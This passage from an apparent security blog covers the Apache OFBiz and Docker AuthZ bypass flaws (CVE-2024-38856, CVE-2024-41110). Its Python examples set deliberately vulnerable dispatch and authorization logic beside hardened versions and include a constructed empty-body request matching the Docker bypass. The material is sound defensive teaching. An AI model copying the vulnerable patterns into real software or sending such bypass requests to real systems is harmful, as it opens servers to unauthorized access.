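def dispatch_vulnerable(path, session):
    """Checks auth only when the endpoint's own config asks for it, and lets the URL
    choose the screen. An unknown request name falls through to a default screen."""
    request_name, _, view_override = path.strip("/").partition("/")
    cfg = REQUEST_MAP.get(request_name, {})
    if cfg.get("auth") and not session.get("user"):
        raise AuthRequired(request_name)
    return render(view_override or cfg.get("view", "DefaultScreen"))


def dispatch_hardened(path, session):
    """Authentication is the default; the rendered screen is bound to the request
    map, not to the URL; anything unknown is refused instead of defaulted."""
    request_name, _, view_override = path.strip("/").partition("/")
    cfg = REQUEST_MAP.get(request_name)
    if cfg is None:
        raise UnknownRequest(request_name)
    view = cfg["view"]
    if view_override and view_override != view:
        raise UnknownRequest(view_override)
    if cfg.get("auth", True) and not session.get("user"):
        raise AuthRequired(view)
    return render(view)


def probe(dispatcher, path, session):
    """Summarise a dispatch outcome as a short string for side-by-side comparison."""
    try:
        return "allowed " + dispatcher(path, session)
    except AuthRequired:
        return "denied auth"
    except UnknownRequest:
        return "denied unknown"


if __name__ == "__main__":
    anon = {}
    for path in ("exportData", "forgotPassword/ScriptRunnerScreen", "viewOrders", "login", "nosuch"):
        print(f"{path:36} vulnerable: {probe(dispatch_vulnerable, path, anon):38} "
              f"hardened: {probe(dispatch_hardened, path, anon)}")
```

With an anonymous session, the weak dispatcher renders the export screen (no flag means no check), renders the script-running screen through a public request name, and serves a default screen for a name nobody configured; the hardened one denies all three and still serves the login screen and, for a logged-in user, the order list.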

    This, in fact, is not the first vulnerability in Apache OFBiz in recent months. The previous vulnerability, CVE-2023-51467, also had a CVSS score of 9.8. It was related to the login function and resulted from an incomplete fix of a previous critical vulnerability, CVE-2023-49070. The latter was a flaw that also allowed for RCE, potentially leading to complete server control and theft of sensitive data.

RCE/ACE (remote or arbitrary code execution) vulnerabilities deservedly sit among the most dangerous flaws. Since they can provide both initial access and lateral movement, any adversary wants them, at any attack stage. And given where CVE-2024-38856 sits, in the ERP system itself, successful exploitation may be the key to leaking large amounts of sensitive internal information.

    Apache OFBiz Flaw Patched

    Unlike the mentioned vulnerabilities, which attackers actively attempted to exploit, there have been no reports of CVE-2024-38856 being exploited in the wild at the time of writing. Though there is an obvious tendency for hackers to start exploiting the flaw soon after the disclosure. That happened with some of the previous vulnerabilities in Apache products, and I have no doubt that this will happen to this one, too.

    Regardless, the Apache OFBiz team released a patch for CVE-2024-38856 within 24 hours after the disclosure. Companies that use OFBiz should update to version 18.12.15, which addresses the vulnerability. Unfortunately, no workaround is available, meaning that applying the update is the only fix option.

Docker Engine Authentication Bypass Vulnerability Exploited https://gridinsoft.com/blogs/docker-engine-authentication-bypass/ Thu, 25 Jul 2024 18:18:11 +0000

    The post Docker Engine Authentication Bypass Vulnerability Exploited appeared first on Gridinsoft Blog.

Attackers are actively exploiting a critical vulnerability in Docker Engine that allows an authorization bypass as part of an attack chain. The flaw lets attackers bypass AuthZ authorization plugins, effectively nullifying any access control they enforce. For this and several other reasons, it received the maximum severity score possible (10.0).

    Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins

Docker has reported a critical vulnerability in a range of Docker Engine versions. It enables threat actors to bypass authorization plugins (AuthZ) under specific conditions. The vulnerability is tracked as CVE-2024-41110 and rated CVSS 10.0.

Vulnerability-affected versions

The “predecessor” of this flaw first appeared back in 2018 and was patched in January 2019. However, in April 2024 the flaw resurfaced in current versions of the software suite: according to the developers, the fix was never carried forward to the newer major versions, so the bug is a regression.

In summary, CVE-2024-41110 allows an attacker to send a specially crafted API request with a Content-Length of 0, which tricks the Docker daemon into forwarding it to the AuthZ plugin without a body. API requests normally carry a body that the authorization plugin inspects to make its access control decision. With Content-Length set to 0, the plugin receives the request without that body, cannot validate it properly, and may approve an action it should have denied, up to and including privilege escalation.
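To see why a missing body is dangerous, here is the decision side of an authorization plugin in a vulnerable and a fail-closed form. This Python is an added example written for this post, not Docker’s middleware or any real AuthZ plugin; the request layout follows the AuthZ plugin API’s AuthZReq document (RequestMethod, RequestURI, RequestHeaders and a base64 RequestBody), while the policy, the endpoint pattern, the helper names and the sample requests are constructed.

```python
"""
Plugin-side decision logic for a Docker authorization (AuthZ) plugin: a policy that
only objects to what it can see, beside one that refuses to decide blind.
"""
import base64
import json
import re

# Endpoints whose safety can only be judged from the body (constructed policy).
BODY_DECIDED = re.compile(r"/containers/(?:create|[^/]+/exec)$")


def make_authz_req(method, uri, body=None, headers=None):
    """Build the JSON document the daemon POSTs to /AuthZPlugin.AuthZReq (constructed)."""
    req = {
        "User": "cli-user",
        "UserAuthNMethod": "TLS",
        "RequestMethod": method,
        "RequestURI": uri,
        "RequestHeaders": dict(headers or {}),
    }
    if body is not None:
        raw = json.dumps(body).encode()
        req["RequestBody"] = base64.b64encode(raw).decode()
        req["RequestHeaders"].setdefault("Content-Length", str(len(raw)))
    return json.dumps(req)


def _body_of(req):
    b64 = req.get("RequestBody") or ""
    return base64.b64decode(b64) if b64 else b""


def _header(req, name):
    headers = req.get("RequestHeaders") or {}
    return next((v for k, v in headers.items() if k.lower() == name.lower()), None)


def needs_body(uri):
    """True for API paths (any version prefix) whose effect is defined by the body."""
    return bool(BODY_DECIDED.search(uri.split("?", 1)[0]))


def is_dangerous(body):
    """Refuse privileged containers, host PID namespace, and mounts of / or the socket."""
    try:
        host = json.loads(body).get("HostConfig") or {}
    except (ValueError, AttributeError):
        return True  # unparseable or not an object: do not guess
    binds = [b.split(":", 1)[0] for b in host.get("Binds") or []]
    return (bool(host.get("Privileged"))
            or host.get("PidMode") == "host"
            or any(src in ("/", "/var/run/docker.sock") for src in binds))


def decide_vulnerable(raw):
    """Inspects a body only if one arrived; an absent body looks like nothing to object to."""
    req = json.loads(raw)
    body = _body_of(req)
    if (req["RequestMethod"] == "POST" and needs_body(req["RequestURI"])
            and body and is_dangerous(body)):
        return {"Allow": False, "Msg": "dangerous HostConfig"}
    return {"Allow": True}


def decide_hardened(raw):
    """Fail closed: a body-decided endpoint with no body (or Content-Length: 0) is denied."""
    req = json.loads(raw)
    if req["RequestMethod"] in ("POST", "PUT") and needs_body(req["RequestURI"]):
        body = _body_of(req)
        if not body or _header(req, "Content-Length") == "0":
            return {"Allow": False, "Msg": "body required for this endpoint but none was forwarded"}
        if is_dangerous(body):
            return {"Allow": False, "Msg": "dangerous HostConfig"}
    return {"Allow": True}


# Constructed sample requests.
CREATE_PRIV = make_authz_req("POST", "/v1.45/containers/create?name=x",
                             {"Image": "alpine", "HostConfig": {"Privileged": True}})
CREATE_PLAIN = make_authz_req("POST", "/v1.45/containers/create",
                              {"Image": "alpine", "HostConfig": {"Binds": ["/srv/app:/app"]}})
CREATE_EMPTY = make_authz_req("POST", "/v1.45/containers/create",
                              headers={"Content-Length": "0"})  # the CVE-2024-41110 shape
LIST = make_authz_req("GET", "/v1.45/containers/json")

if __name__ == "__main__":
    for name, req in [("privileged", CREATE_PRIV), ("plain", CREATE_PLAIN),
                      ("empty body", CREATE_EMPTY), ("list", LIST)]:
        print(f"{name:11} vulnerable={decide_vulnerable(req)['Allow']} "
              f"hardened={decide_hardened(req)['Allow']}")
```

A plugin hardened this way only narrows the window; the real fix is the Engine update. On a host, `docker version --format '{{.Server.Version}}'` shows whether the daemon is at 27.1.1 or later, and the Authorization entry in the plugin section of `docker info` shows whether an AuthZ plugin is loaded at all.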

That explains the maximum CVSS score. Authorization bypass vulnerabilities are as bad as RCE/ACE ones and have similar uses: adversaries can employ them to gain initial access or to move laterally. At the very least, attackers can read the data reachable through the Docker API and leak it outside.

    Risk Group & Vulnerability Patches

As for who is exposed: affected are Docker Engine v19.03.x and later versions that use authorization plugins to make access control decisions. Deployments that do not run any authorization plugin are not exposed to this vector at all. There is also a limited risk for Docker Desktop up to version 4.32.0, but exploiting it there requires the attacker to already have local access to the host machine, or the Docker daemon to be insecurely exposed over TCP.

Conversely, Engine versions, the developer’s commercial products and internal infrastructure that do not rely on authorization plugins for access control decisions, as well as all versions of Mirantis Container Runtime, are not vulnerable.

Docker has released an update (docker-ce v27.1.1) that fixes the flaw and strongly recommends updating Docker Engine. If the update cannot be applied right away, the developers recommend at least disabling AuthZ plugins until it can be; given the exposure condition above, the daemon’s API should in any case not be reachable over an unprotected TCP socket.
